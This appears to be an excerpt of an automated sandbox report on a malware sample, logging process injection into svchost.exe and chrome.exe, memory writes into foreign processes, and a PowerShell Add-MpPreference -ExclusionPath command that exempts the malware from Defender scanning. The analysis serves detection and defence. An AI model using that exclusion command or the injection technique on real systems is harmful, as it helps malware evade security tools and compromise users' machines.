                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: unknown protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: unknown protection: execute and read and write
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3062008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26B5008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2483008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 24E2008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E34008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E3D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2754008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C3F008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2365008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E51008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 254A008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A5D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AEF008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B6B008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 23AD008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B88008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2829008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DB5008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26EC008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25F8008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C65008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 23F4008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25DB008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CEA008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 275F008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EBA008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27FB008
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_00410F36
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00418764 mouse_event,3_2_00418764
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
